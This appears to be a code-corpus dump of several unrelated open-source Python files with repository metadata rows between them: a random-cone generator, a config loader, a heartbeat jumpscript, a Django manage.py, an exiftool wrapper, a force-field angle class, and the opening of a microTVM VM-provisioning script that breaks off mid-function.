if max_rays is not None and max_rays < 2:
msg = 'all cones are strictly convex when ``max_rays`` is '
msg += 'less than two.'
raise ValueError(msg)
# Sanity checks for solid cones.
if solid is not None and solid:
# The user wants a solid cone.
if lattice is None:
if max_rays is not None:
if max_rays < min_ambient_dim:
msg = 'max_rays must be at least min_ambient_dim for '
msg += 'a solid cone.'
raise ValueError(msg)
else:
# Repeat the checks above when a lattice is given.
if max_rays is not None and max_rays < lattice.dimension():
msg = "max_rays must be at least {0} for a solid cone "
msg += "in this lattice."
raise ValueError(msg.format(lattice.dimension()))
# Sanity checks for non-solid cones.
if solid is not None and not solid:
if lattice is None:
if max_ambient_dim is not None and max_ambient_dim == 0:
msg = 'all cones are solid when max_ambient_dim is zero.'
raise ValueError(msg)
if (max_ambient_dim is not None and
min_rays > 2*(max_ambient_dim - 1)):
msg = 'every cone is solid when '
msg += 'min_rays > 2*(max_ambient_dim - 1).'
raise ValueError(msg)
else:
if lattice.dimension() == 0:
msg = 'all cones in the given lattice are solid.'
raise ValueError(msg)
if min_rays > 2*(lattice.dimension() - 1):
msg = 'every cone is solid when min_rays > 2*(d - 1) '
msg += 'where d is the dimension of the given lattice.'
raise ValueError(msg)
# Now that we've sanity-checked our parameters, we can massage the
# min/maxes for (non-)solid cones. It doesn't violate the user's
# expectation to increase a minimum, decrease a maximum, or fix an
# "I don't care" parameter.
if solid is not None:
if solid:
# If max_ambient_dim is "I don't care", we can set it so that we
# are guaranteed to generate a solid cone.
if max_rays is not None and max_ambient_dim is None:
# We won't make max_ambient_dim less than min_ambient_dim,
# since we already checked that
# min_ambient_dim <= min_rays = max_ambient_dim.
max_ambient_dim = min_rays
else:
if max_rays is None and max_ambient_dim is not None:
# This is an upper limit on the number of rays in a
# non-solid cone.
max_rays = 2*(max_ambient_dim - 1)
if max_rays is None and lattice is not None:
# Same thing, except when we're given a lattice.
max_rays = 2*(lattice.dimension() - 1)
def random_min_max(l,u):
r"""
We need to handle two cases for the upper bounds, and we need
to do the same thing for max_ambient_dim/max_rays. So we consolidate
the logic here.
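For example, ``random_min_max(2, 5)`` returns an integer between
``2`` and ``5`` inclusive, while ``random_min_max(2, None)`` returns
some integer that is at least ``2``.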
"""
if u is None:
# The upper bound is unspecified; return a random integer
# in [l,infinity).
return l + ZZ.random_element().abs()
else:
# We have an upper bound, and it's greater than or equal
# to our lower bound. So we generate a random integer in
# [0,u-l], and then add it to l to get something in
# [l,u]. To understand the "+1", check the
# ZZ.random_element() docs.
return l + ZZ.random_element(u - l + 1)
def is_valid(K):
r"""
Check if the given cone is valid; that is, if its ambient
dimension and number of rays meet the upper and lower bounds
provided by the user.
"""
if lattice is None:
# We only care about min/max_ambient_dim when no lattice is given.
if K.lattice_dim() < min_ambient_dim:
return False
if (max_ambient_dim is not None and
K.lattice_dim() > max_ambient_dim):
return False
else:
if K.lattice() is not lattice:
return False
return all([K.nrays() >= min_rays,
max_rays is None or K.nrays() <= max_rays,
solid is None or K.is_solid() == solid,
strictly_convex is None or
K.is_strictly_convex() == strictly_convex])
# Now we actually compute the thing. To avoid recursion (and the
# associated "maximum recursion depth exceeded" error), we loop
# until we have a valid cone and occasionally throw everything out
# and start over from scratch.
while True:
L = lattice
if lattice is None:
# No lattice given, make our own.
d = random_min_max(min_ambient_dim, max_ambient_dim)
L = ToricLattice(d)
else:
d = L.dimension()
# The number of rays that we will try to attain in this iteration.
r = random_min_max(min_rays, max_rays)
# The rays are trickier to generate, since we could generate v and
# 2*v as our "two rays." In that case, the resulting cone would
# have only one generating ray -- not what we want.
#
# Let's begin with an easier question: how many rays should we
# start with? If we want to attain r rays in this iteration,
# then surely r is a good number to start with, even if some
# of them will be redundant?
#
# Not quite, because after 2*d rays, there is a greater
# tendency for them to be redundant. If, for example, the
# maximum number of rays is unbounded, then r could be enormous.
# Ultimately that won't be a problem, because almost all of
# those rays will be thrown out. However, as we discovered in
# Trac #24517, simply generating the random rays in the first
# place (and storing them in a list) is problematic.
#
# Since the returns fall off around 2*d, we start with the
# smaller of the two numbers 2*d or r to ensure that we don't
# pay a huge performance penalty for things we're going to
# throw out anyway. This has a side effect, namely that if you
# ask for more than 2*d rays, then you'll probably get the
# minimum amount, because we'll start with 2*d and add them
# one-at-a-time (see below).
rays = [L.random_element() for i in range(min(r,2*d))]
# The lattice parameter is required when no rays are given, so
# we pass it in case r == 0 or d == 0 (or d == 1 but we're
# making a strictly convex cone).
K = Cone(rays, lattice=L)
# Now, some of the rays that we generated were probably redundant,
# so we need to come up with more. We can obviously stop if K
# becomes the entire ambient vector space.
#
# We're still not guaranteed to have the correct number of
# rays after this! Since we normalize the generators in the
# loop above, we can jump from two to four generators by
# adding e.g. (1,1) to [(0,1), (0,-1)]. Rather than trying to
# mangle what we have, we just start over if we get a cone
# that won't work.
#
while r > K.nrays() and not K.is_full_space():
rays.append(L.random_element())
K = Cone(rays, lattice=L)
rays = list(K.rays()) # Avoid re-normalizing next time around
if strictly_convex is not None:
if strictly_convex:
if not K.is_strictly_convex():
# The user wants a strictly convex cone, but
# didn't get one. So let's take our rays, and give
# them all either (strictly) positive or negative
# leading coordinates. This makes the resulting
# cone strictly convex. Whether or not those
# coordinates become positive/negative is chosen
# randomly.
from random import choice
pm = choice([-1,1])
# rays has immutable elements
rays = [copy(ray) for ray in rays]
for i, ray in enumerate(rays):
rays[i][0] = pm * (ray[0].abs() + 1)
K = Cone(rays, lattice=L)
else:
# The user requested that the cone be NOT strictly
# convex. So it should contain some line...
if K.is_strictly_convex():
# ...but it doesn't. If K has at least two rays,
# we can just make the second one a multiple of
# the first -- then K will contain a line. If K
# has fewer than two rays, we punt.
if len(rays) >= 2:
rays[1] = -rays[0]
K = Cone(rays, lattice=L)
if is_valid(K):
# Return as soon as we have a valid cone; otherwise the while loop tries again.
return K
| 34.819448 | 135 | 0.544155 |
4a1b57587f05c4ff9db916a44af54b319556d244
| 1,057 |
py
|
Python
|
prg/config.py
|
abultman/PiAutomator
|
2ad3aafdd6c94cf11fc2d60c9be489f76ac78277
|
[
"Apache-2.0"
] | 5 |
2015-10-21T05:54:30.000Z
|
2021-01-13T01:10:36.000Z
|
prg/config.py
|
abultman/PiAutomator
|
2ad3aafdd6c94cf11fc2d60c9be489f76ac78277
|
[
"Apache-2.0"
] | null | null | null |
prg/config.py
|
abultman/PiAutomator
|
2ad3aafdd6c94cf11fc2d60c9be489f76ac78277
|
[
"Apache-2.0"
] | 5 |
2015-03-30T16:25:40.000Z
|
2016-07-29T09:10:03.000Z
|
#!/usr/bin/python
import yaml
from functools import reduce # needed on Python 3, where reduce is no longer a builtin
class AutomationConfig(object):
def __init__(self, basedir):
self.basedir = basedir
with open("%s/conf/config.yaml" % basedir) as f:
self.yaml = yaml.load(f)
def get_setting(self, mapList, default=None):
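# Illustrative usage (the 'foo'/'bar' keys are hypothetical):
# get_setting(['inputs']) returns self.yaml['inputs'], while
# get_setting(['foo', 'bar'], default=0) walks self.yaml['foo']['bar']
# and falls back to 0 if either key is missing.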
try:
return reduce(lambda d, k: d[k], mapList, self.yaml)
except KeyError as e:
if default is not None:
return default
else:
raise e
def inputs(self):
return self.get_setting(['inputs'])
def receivers(self):
return self.get_setting(['receivers'])
def rules(self):
return self.get_setting(['rules'])
def get_basedir(self):
return self.basedir
class LocalSettings(object):
def __init__(self, data):
self.data = data
def __getitem__(self, key):
return self.getsetting(key)
def getsetting(self, key, default = None):
if key in self.data:
return self.data[key]
else:
return default
| 24.022727 | 64 | 0.578051 |
4a1b57ba17552fd713b33a98c51307b3f44c6ac2
| 492 |
py
|
Python
|
apps/agentcontroller/jumpscripts/extended/system/processmanager_heartbeat_to_osis.py
|
Jumpscale/jumpscale6_core
|
0502ddc1abab3c37ed982c142d21ea3955d471d3
|
[
"BSD-2-Clause"
] | 1 |
2015-10-26T10:38:13.000Z
|
2015-10-26T10:38:13.000Z
|
apps/agentcontroller/jumpscripts/extended/system/processmanager_heartbeat_to_osis.py
|
Jumpscale/jumpscale6_core
|
0502ddc1abab3c37ed982c142d21ea3955d471d3
|
[
"BSD-2-Clause"
] | null | null | null |
apps/agentcontroller/jumpscripts/extended/system/processmanager_heartbeat_to_osis.py
|
Jumpscale/jumpscale6_core
|
0502ddc1abab3c37ed982c142d21ea3955d471d3
|
[
"BSD-2-Clause"
] | null | null | null |
from JumpScale import j
import JumpScale.grid.osis
descr = """
heartbeat in process to osis
"""
organization = "jumpscale"
author = "kristof@incubaid.com"
license = "bsd"
version = "1.0"
category = "system.heartbeat"
startatboot = True
period = 60 #always in sec
order = 1
enable = True
async = False
roles=["*"]
def action():
osiscl = j.core.osis.getClientByInstance()
hbcl = j.core.osis.getClientForCategory(osiscl, 'system', 'heartbeat')
obj = hbcl.new()
hbcl.set(obj)
| 18.923077 | 74 | 0.693089 |
4a1b5a61ebf1b07c8ca247341f074da362599019
| 326 |
py
|
Python
|
QandA/manage.py
|
rtbortolin/QandA
|
103dac34170e52ff35f36540477bb382efb4c27f
|
[
"MIT"
] | null | null | null |
QandA/manage.py
|
rtbortolin/QandA
|
103dac34170e52ff35f36540477bb382efb4c27f
|
[
"MIT"
] | null | null | null |
QandA/manage.py
|
rtbortolin/QandA
|
103dac34170e52ff35f36540477bb382efb4c27f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Command-line utility for administrative tasks.
"""
import os
import sys
if __name__ == "__main__":
os.environ.setdefault(
"DJANGO_SETTINGS_MODULE",
"QandA.settings"
)
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 18.111111 | 64 | 0.708589 |
4a1b5a783333a86a445730e79f0ff256f03f16b2
| 17,082 |
py
|
Python
|
autofile/exiftool.py
|
RhetTbull/autofile
|
b61235b29f8047699654ea101312bda257835e7c
|
[
"MIT"
] | 6 |
2021-11-18T17:33:04.000Z
|
2022-01-08T04:51:55.000Z
|
autofile/exiftool.py
|
RhetTbull/autofile
|
b61235b29f8047699654ea101312bda257835e7c
|
[
"MIT"
] | 8 |
2021-10-30T16:04:56.000Z
|
2022-01-02T17:26:52.000Z
|
autofile/exiftool.py
|
RhetTbull/autofile
|
b61235b29f8047699654ea101312bda257835e7c
|
[
"MIT"
] | null | null | null |
""" Yet another simple exiftool wrapper
I rolled my own for the following reasons:
1. I wanted something under MIT license (best alternative was licensed under GPL/BSD)
2. I wanted singleton behavior so only a single exiftool process was ever running
3. When used as a context manager, I wanted the operations to batch until exiting the context (improved performance)
If these aren't important to you, I highly recommend you use Sven Marnach's excellent
pyexiftool: https://github.com/smarnach/pyexiftool which provides more functionality """
import atexit
import html
import json
import logging
import os
import re
import shutil
import subprocess
from abc import ABC, abstractmethod
from functools import lru_cache # pylint: disable=syntax-error
# exiftool -stay_open command output ends with this EOF marker after each command is run
EXIFTOOL_STAYOPEN_EOF = "{ready}"
EXIFTOOL_STAYOPEN_EOF_LEN = len(EXIFTOOL_STAYOPEN_EOF)
# list of exiftool processes to cleanup when exiting or when terminate is called
EXIFTOOL_PROCESSES = []
def escape_str(s):
"""escape string for use with exiftool -E"""
if type(s) != str:
return s
s = html.escape(s)
s = s.replace("\n", "&#xa;")
s = s.replace("\t", "&#x9;")
s = s.replace("\r", "&#xd;")
return s
def unescape_str(s):
"""unescape an HTML string returned by exiftool -E"""
if type(s) != str:
return s
return html.unescape(s)
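# For example (illustrative): escape_str("a\nb") returns "a&#xa;b", and
# unescape_str("a&#xa;b") returns "a\nb"; non-string values are passed
# through unchanged by both functions.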
@atexit.register
def terminate_exiftool():
"""Terminate any running ExifTool subprocesses; call this to cleanup when done using ExifTool"""
for proc in EXIFTOOL_PROCESSES:
proc._stop_proc()
@lru_cache(maxsize=1)
def get_exiftool_path():
"""return path of exiftool, cache result"""
if exiftool_path := shutil.which("exiftool"):
return exiftool_path.rstrip()
else:
raise FileNotFoundError(
"Could not find exiftool. Please download and install from "
"https://exiftool.org/"
)
class _ExifToolProc:
"""Runs exiftool in a subprocess via Popen
Creates a singleton object"""
def __new__(cls, *args, **kwargs):
"""create new object or return instance of already created singleton"""
if not hasattr(cls, "instance") or not cls.instance:
cls.instance = super().__new__(cls)
return cls.instance
def __init__(self, exiftool=None):
"""construct _ExifToolProc singleton object or return instance of already created object
exiftool: optional path to exiftool binary (if not provided, will search path to find it)"""
if hasattr(self, "_process_running") and self._process_running:
# already running
if exiftool is not None and exiftool != self._exiftool:
logging.warning(
f"exiftool subprocess already running, "
f"ignoring exiftool={exiftool}"
)
return
self._process_running = False
self._exiftool = exiftool or get_exiftool_path()
self._start_proc()
@property
def process(self):
"""return the exiftool subprocess"""
if not self._process_running:
self._start_proc()
return self._process
@property
def pid(self):
"""return process id (PID) of the exiftool process"""
return self._process.pid
@property
def exiftool(self):
"""return path to exiftool process"""
return self._exiftool
def _start_proc(self):
"""start exiftool in batch mode"""
if self._process_running:
logging.warning(f"exiftool already running: {self._process}")
return
# open exiftool process
self._process = subprocess.Popen(
[
self._exiftool,
"-stay_open", # keep process open in batch mode
"True", # -stay_open=True, keep process open in batch mode
"-@", # read command-line arguments from file
"-", # read from stdin
"-common_args", # specifies args common to all commands subsequently run
"-n", # no print conversion (e.g. print tag values in machine readable format)
"-P", # Preserve file modification date/time
"-G", # print group name for each tag
"-E", # escape tag values for HTML (allows use of HTML 
 for newlines)
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self._process_running = True
EXIFTOOL_PROCESSES.append(self)
def _stop_proc(self):
"""stop the exiftool process if it's running, otherwise, do nothing"""
if not self._process_running:
return
try:
self._process.stdin.write(b"-stay_open\n")
self._process.stdin.write(b"False\n")
self._process.stdin.flush()
except Exception as e:
pass
try:
self._process.communicate(timeout=5)
except subprocess.TimeoutExpired:
self._process.kill()
self._process.communicate()
del self._process
self._process_running = False
class ExifTool:
"""Basic exiftool interface for reading and writing EXIF tags"""
def __init__(self, filepath, exiftool=None, overwrite=True, flags=None):
"""Create ExifTool object
Args:
file: path to image file
exiftool: path to exiftool, if not specified will look in path
            overwrite: if True, will overwrite image file without creating backup, default=True
flags: optional list of exiftool flags to prepend to exiftool command when writing metadata (e.g. -m or -F)
Returns:
ExifTool instance
"""
self.file = filepath
self.overwrite = overwrite
self.flags = flags or []
self.data = {}
self.warning = None
self.error = None
# if running as a context manager, self._context_mgr will be True
self._context_mgr = False
self._exiftoolproc = _ExifToolProc(exiftool=exiftool)
self._read_exif()
@property
def _process(self):
return self._exiftoolproc.process
def setvalue(self, tag, value):
"""Set tag to value(s); if value is None, will delete tag
Args:
tag: str; name of tag to set
value: str; value to set tag to
Returns:
True if success otherwise False
If error generated by exiftool, returns False and sets self.error to error string
If warning generated by exiftool, returns True (unless there was also an error) and sets self.warning to warning string
If called in context manager, returns True (execution is delayed until exiting context manager)
"""
if value is None:
value = ""
value = escape_str(value)
command = [f"-{tag}={value}"]
if self.overwrite and not self._context_mgr:
command.append("-overwrite_original")
# avoid "Warning: Some character(s) could not be encoded in Latin" warning
command.append("-iptc:codedcharacterset=utf8")
if self._context_mgr:
self._commands.extend(command)
return True
else:
_, _, error = self.run_commands(*command)
return error == ""
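    # Illustrative setvalue() usage (file path and tag value are hypothetical):
    #   exif = ExifTool("photo.jpg")
    #   if not exif.setvalue("IPTC:Keywords", "vacation"):
    #       print(exif.error)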
def addvalues(self, tag, *values):
"""Add one or more value(s) to tag
If more than one value is passed, each value will be added to the tag
Args:
tag: str; tag to set
*values: str; one or more values to set
Returns:
True if success otherwise False
If error generated by exiftool, returns False and sets self.error to error string
If warning generated by exiftool, returns True (unless there was also an error) and sets self.warning to warning string
If called in context manager, returns True (execution is delayed until exiting context manager)
Notes: exiftool may add duplicate values for some tags so the caller must ensure
the values being added are not already in the EXIF data
For some tags, such as IPTC:Keywords, this will add a new value to the list of keywords,
but for others, such as EXIF:ISO, this will literally add a value to the existing value.
It's up to the caller to know what exiftool will do for each tag
If setvalue called before addvalues, exiftool does not appear to add duplicates,
but if addvalues called without first calling setvalue, exiftool will add duplicate values
"""
if not values:
raise ValueError("Must pass at least one value")
command = []
for value in values:
if value is None:
raise ValueError("Can't add None value to tag")
value = escape_str(value)
command.append(f"-{tag}+={value}")
if self.overwrite and not self._context_mgr:
command.append("-overwrite_original")
if self._context_mgr:
self._commands.extend(command)
return True
else:
_, _, error = self.run_commands(*command)
return error == ""
def run_commands(self, *commands, no_file=False):
"""Run commands in the exiftool process and return result.
Args:
*commands: exiftool commands to run
no_file: (bool) do not pass the filename to exiftool (default=False)
by default, all commands will be run against self.file
use no_file=True to run a command without passing the filename
Returns:
            (output, warning, error)
            output: bytes containing output of exiftool commands
            warning: if exiftool generated warnings, string containing warning otherwise empty string
            error: if exiftool generated errors, string containing error otherwise empty string
Note: Also sets self.warning and self.error if warning or error generated.
"""
if not (hasattr(self, "_process") and self._process):
raise ValueError("exiftool process is not running")
if not commands:
raise TypeError("must provide one or more command to run")
if self._context_mgr and self.overwrite:
commands = list(commands)
commands.append("-overwrite_original")
filename = os.fsencode(self.file) if not no_file else b""
if self.flags:
# need to split flags, e.g. so "--ext AVI" becomes ["--ext", "AVI"]
flags = []
for f in self.flags:
flags.extend(f.split())
command_str = b"\n".join([f.encode("utf-8") for f in flags])
command_str += b"\n"
else:
command_str = b""
command_str += (
b"\n".join([c.encode("utf-8") for c in commands])
+ b"\n"
+ filename
+ b"\n"
+ b"-execute\n"
)
# send the command
self._process.stdin.write(command_str)
self._process.stdin.flush()
# read the output
output = b""
warning = b""
error = b""
while EXIFTOOL_STAYOPEN_EOF not in str(output):
line = self._process.stdout.readline()
if line.startswith(b"Warning"):
warning += line.strip()
elif line.startswith(b"Error"):
error += line.strip()
else:
output += line.strip()
warning = "" if warning == b"" else warning.decode("utf-8")
error = "" if error == b"" else error.decode("utf-8")
self.warning = warning
self.error = error
return output[:-EXIFTOOL_STAYOPEN_EOF_LEN], warning, error
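    # Sketch of the -stay_open protocol implemented above (file name hypothetical):
    # run_commands("-XMP:Title=test") on file "img.jpg", with no extra flags and outside
    # a context manager, writes b"-XMP:Title=test\nimg.jpg\n-execute\n" to exiftool's
    # stdin and then reads stdout until the "{ready}" sentinel appears.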
@property
def pid(self):
"""return process id (PID) of the exiftool process"""
return self._process.pid
@property
def version(self):
"""returns exiftool version"""
ver, _, _ = self.run_commands("-ver", no_file=True)
return ver.decode("utf-8")
def asdict(self, tag_groups=True, normalized=False):
"""return dictionary of all EXIF tags and values from exiftool
returns empty dict if no tags
Args:
tag_groups: if True (default), dict keys have tag groups, e.g. "IPTC:Keywords"; if False, drops groups from keys, e.g. "Keywords"
normalized: if True, dict keys are all normalized to lower case (default is False)
"""
json_str, _, _ = self.run_commands("-json")
if not json_str:
return dict()
json_str = unescape_str(json_str.decode("utf-8"))
try:
exifdict = json.loads(json_str)
except Exception as e:
# will fail with some commands, e.g --ext AVI which produces
# 'No file with specified extension' instead of json
return dict()
exifdict = exifdict[0]
if not tag_groups:
# strip tag groups
exif_new = {}
for k, v in exifdict.items():
k = re.sub(r".*:", "", k)
exif_new[k] = v
exifdict = exif_new
if normalized:
exifdict = {k.lower(): v for (k, v) in exifdict.items()}
return exifdict
def json(self):
"""returns JSON string containing all EXIF tags and values from exiftool"""
json, _, _ = self.run_commands("-json")
json = unescape_str(json.decode("utf-8"))
return json
def _read_exif(self):
"""read exif data from file"""
data = self.asdict()
self.data = {k: v for k, v in data.items()}
def __str__(self):
return f"file: {self.file}\nexiftool: {self._exiftoolproc._exiftool}"
def __enter__(self):
self._context_mgr = True
self._commands = []
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type:
return False
elif self._commands:
# run_commands sets self.warning and self.error as needed
self.run_commands(*self._commands)
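# Illustrative batched use as a context manager (file path and tag values hypothetical):
#   with ExifTool("photo.jpg") as exif:
#       exif.setvalue("XMP:Title", "My Title")
#       exif.addvalues("IPTC:Keywords", "travel")
#   # the queued commands are executed once, when the with-block exits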
class ExifToolCaching(ExifTool):
"""Basic exiftool interface for reading and writing EXIF tags, with caching.
Use this only when you know the file's EXIF data will not be changed by any external process.
Creates a singleton cached ExifTool instance"""
_singletons = {}
def __new__(cls, filepath, exiftool=None):
"""create new object or return instance of already created singleton"""
if filepath not in cls._singletons:
cls._singletons[filepath] = _ExifToolCaching(filepath, exiftool=exiftool)
return cls._singletons[filepath]
class _ExifToolCaching(ExifTool):
def __init__(self, filepath, exiftool=None):
"""Create read-only ExifTool object that caches values
Args:
file: path to image file
exiftool: path to exiftool, if not specified will look in path
Returns:
ExifTool instance
"""
self._json_cache = None
self._asdict_cache = {}
super().__init__(filepath, exiftool=exiftool, overwrite=False, flags=None)
def run_commands(self, *commands, no_file=False):
if commands[0] not in ["-json", "-ver"]:
raise NotImplementedError(f"{self.__class__} is read-only")
return super().run_commands(*commands, no_file=no_file)
def setvalue(self, tag, value):
raise NotImplementedError(f"{self.__class__} is read-only")
def addvalues(self, tag, *values):
raise NotImplementedError(f"{self.__class__} is read-only")
def json(self):
if not self._json_cache:
self._json_cache = super().json()
return self._json_cache
def asdict(self, tag_groups=True, normalized=False):
"""return dictionary of all EXIF tags and values from exiftool
returns empty dict if no tags
Args:
tag_groups: if True (default), dict keys have tag groups, e.g. "IPTC:Keywords"; if False, drops groups from keys, e.g. "Keywords"
normalized: if True, dict keys are all normalized to lower case (default is False)
"""
try:
return self._asdict_cache[tag_groups][normalized]
except KeyError:
if tag_groups not in self._asdict_cache:
self._asdict_cache[tag_groups] = {}
self._asdict_cache[tag_groups][normalized] = super().asdict(
tag_groups=tag_groups, normalized=normalized
)
return self._asdict_cache[tag_groups][normalized]
def flush_cache(self):
"""Clear cached data so that calls to json or asdict return fresh data"""
self._json_cache = None
self._asdict_cache = {}
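# Illustrative caching behavior (file path hypothetical):
#   cached = ExifToolCaching("photo.jpg")   # per-file singleton
#   d1 = cached.asdict()                    # runs exiftool and caches the result
#   d2 = cached.asdict()                    # returned from the cache
#   cached.flush_cache()                    # next asdict()/json() re-reads the file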
| 35.962105 | 141 | 0.610233 |
4a1b5aa1903da83733372e7525fb4fab6b6df0cc
| 1,863 |
py
|
Python
|
intermol/forces/urey_bradley_angle_type.py
|
ctk3b/intermol
|
5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d
|
[
"MIT"
] | null | null | null |
intermol/forces/urey_bradley_angle_type.py
|
ctk3b/intermol
|
5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d
|
[
"MIT"
] | 5 |
2015-01-06T13:21:51.000Z
|
2015-01-20T21:39:11.000Z
|
intermol/forces/urey_bradley_angle_type.py
|
ctk3b/intermol
|
5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d
|
[
"MIT"
] | null | null | null |
import simtk.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_angle_type import AbstractAngleType
class UreyBradleyAngleType(AbstractAngleType):
__slots__ = ['theta', 'k', 'r', 'kUB', 'c']
@accepts_compatible_units(None, None, None,
theta=units.degrees,
k=units.kilojoules_per_mole * units.radians ** (-2),
r=units.nanometers,
kUB=units.kilojoules_per_mole * units.nanometers ** (-2),
c=None)
def __init__(self, bondingtype1, bondingtype2, bondingtype3,
theta=0.0 * units.degrees,
k=0.0 * units.kilojoules_per_mole * units.radians ** (-2),
r=0.0 * units.nanometers,
kUB=0.0 * units.kilojoules_per_mole * units.nanometers ** (-2),
c=False):
AbstractAngleType.__init__(self, bondingtype1, bondingtype2, bondingtype3, c)
self.theta = theta
self.k = k
self.r = r
self.kUB = kUB
class UreyBradleyAngle(UreyBradleyAngleType):
"""
    A Urey-Bradley angle interaction: a harmonic bending term about theta plus a
    harmonic 1-3 (Urey-Bradley) distance term between the outer atoms.
"""
def __init__(self, atom1, atom2, atom3, bondingtype1=None, bondingtype2=None, bondingtype3=None,
theta=0.0 * units.degrees,
k=0.0 * units.kilojoules_per_mole * units.radians ** (-2),
r=0.0 * units.nanometers,
kUB=0.0 * units.kilojoules_per_mole * units.nanometers ** (-2),
c=False):
self.atom1 = atom1
self.atom2 = atom2
self.atom3 = atom3
UreyBradleyAngleType.__init__(self, bondingtype1, bondingtype2, bondingtype3,
theta=theta,
k=k,
r=r,
kUB=kUB,
c=c)
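# Minimal construction sketch (bonding types and parameter values are hypothetical):
#   angle_type = UreyBradleyAngleType(
#       'CT', 'CT', 'CT',
#       theta=109.5 * units.degrees,
#       k=400.0 * units.kilojoules_per_mole * units.radians ** (-2),
#       r=0.15 * units.nanometers,
#       kUB=50.0 * units.kilojoules_per_mole * units.nanometers ** (-2))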
| 39.638298 | 101 | 0.551798 |
4a1b5aea3fecd08b3b1abbd58240d24fb0cf0738
| 22,024 |
py
|
Python
|
apps/microtvm/reference-vm/base-box-tool.py
|
yangulei/tvm
|
d2cbdf381b68134951bfd7525c6a3a67838e5bdf
|
[
"Apache-2.0"
] | 1 |
2021-12-13T22:07:00.000Z
|
2021-12-13T22:07:00.000Z
|
apps/microtvm/reference-vm/base-box-tool.py
|
driazati/tvm
|
b76c817986040dc070d215cf32523d9b2adc8e8b
|
[
"Apache-2.0"
] | 7 |
2022-02-17T23:04:46.000Z
|
2022-03-31T22:22:55.000Z
|
apps/microtvm/reference-vm/base-box-tool.py
|
yelite/tvm
|
7ae919292d42f5858d4db04533bca67b4b5bb44f
|
[
"Apache-2.0"
] | 1 |
2022-02-07T06:50:05.000Z
|
2022-02-07T06:50:05.000Z
|
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
from ast import arg
import copy
import json
import logging
import pathlib
import os
import re
import shlex
import shutil
import subprocess
import sys
_LOG = logging.getLogger(__name__)
THIS_DIR = os.path.realpath(os.path.dirname(__file__) or ".")
# List of vagrant providers supported by this tool
ALL_PROVIDERS = (
"parallels",
"virtualbox",
"vmware_desktop",
)
# List of supported electronics platforms. Each must correspond
# to a sub-directory of this directory.
ALL_PLATFORMS = (
"arduino",
"zephyr",
)
# Extra scripts required to execute on provisioning
# in [platform]/base-box/base_box_provision.sh
COMMON_SCRIPTS = [
"apps/microtvm/reference-vm/base_box_setup_common.sh",
"docker/install/ubuntu_install_core.sh",
"docker/install/ubuntu_install_python.sh",
"docker/utils/apt-install-and-clear.sh",
"docker/install/ubuntu1804_install_llvm.sh",
]
EXTRA_SCRIPTS = {
"arduino": [],
"zephyr": [
"docker/install/ubuntu_init_zephyr_project.sh",
"docker/install/ubuntu_install_zephyr_sdk.sh",
"docker/install/ubuntu_install_cmsis.sh",
],
}
PACKER_FILE_NAME = "packer.json"
# List of identifying strings for microTVM boards for testing.
with open(pathlib.Path(THIS_DIR) / ".." / "zephyr" / "template_project" / "boards.json") as f:
zephyr_boards = json.load(f)
with open(pathlib.Path(THIS_DIR) / ".." / "arduino" / "template_project" / "boards.json") as f:
arduino_boards = json.load(f)
ALL_MICROTVM_BOARDS = {
"arduino": arduino_boards.keys(),
"zephyr": zephyr_boards.keys(),
}
def parse_virtualbox_devices():
output = subprocess.check_output(["VBoxManage", "list", "usbhost"], encoding="utf-8")
devices = []
current_dev = {}
for line in output.split("\n"):
if not line.strip():
if current_dev:
if "VendorId" in current_dev and "ProductId" in current_dev:
devices.append(current_dev)
current_dev = {}
continue
key, value = line.split(":", 1)
value = value.lstrip(" ")
current_dev[key] = value
if current_dev:
devices.append(current_dev)
return devices
VIRTUALBOX_USB_DEVICE_RE = (
"USBAttachVendorId[0-9]+=0x([0-9a-z]{4})\n" + "USBAttachProductId[0-9]+=0x([0-9a-z]{4})"
)
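# The regular expression above matches pairs of consecutive lines of the form
# (values are hypothetical):
#   USBAttachVendorId1=0x0483
#   USBAttachProductId1=0x374b
# which parse_virtualbox_attached_usb_devices() below extracts from the
# "showvminfo --machinereadable" output.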
def parse_virtualbox_attached_usb_devices(vm_uuid):
output = subprocess.check_output(
["VBoxManage", "showvminfo", "--machinereadable", vm_uuid], encoding="utf-8"
)
    r = re.compile(VIRTUALBOX_USB_DEVICE_RE, re.MULTILINE)
    attached_usb_devices = r.findall(output)
# List of couples (VendorId, ProductId) for all attached USB devices
return attached_usb_devices
VIRTUALBOX_VID_PID_RE = re.compile(r"0x([0-9A-Fa-f]{4}).*")
def attach_virtualbox(vm_uuid, vid_hex=None, pid_hex=None, serial=None):
usb_devices = parse_virtualbox_devices()
for dev in usb_devices:
m = VIRTUALBOX_VID_PID_RE.match(dev["VendorId"])
if not m:
_LOG.warning("Malformed VendorId: %s", dev["VendorId"])
continue
dev_vid_hex = m.group(1).lower()
m = VIRTUALBOX_VID_PID_RE.match(dev["ProductId"])
if not m:
_LOG.warning("Malformed ProductId: %s", dev["ProductId"])
continue
dev_pid_hex = m.group(1).lower()
if (
vid_hex == dev_vid_hex
and pid_hex == dev_pid_hex
and (serial is None or serial == dev["SerialNumber"])
):
attached_devices = parse_virtualbox_attached_usb_devices(vm_uuid)
for vid, pid in parse_virtualbox_attached_usb_devices(vm_uuid):
if vid_hex == vid and pid_hex == pid:
print(f"USB dev {vid_hex}:{pid_hex} already attached. Skipping attach.")
return
rule_args = [
"VBoxManage",
"usbfilter",
"add",
"0",
"--action",
"hold",
"--name",
"test device",
"--target",
vm_uuid,
"--vendorid",
vid_hex,
"--productid",
pid_hex,
]
if serial is not None:
rule_args.extend(["--serialnumber", serial])
subprocess.check_call(rule_args)
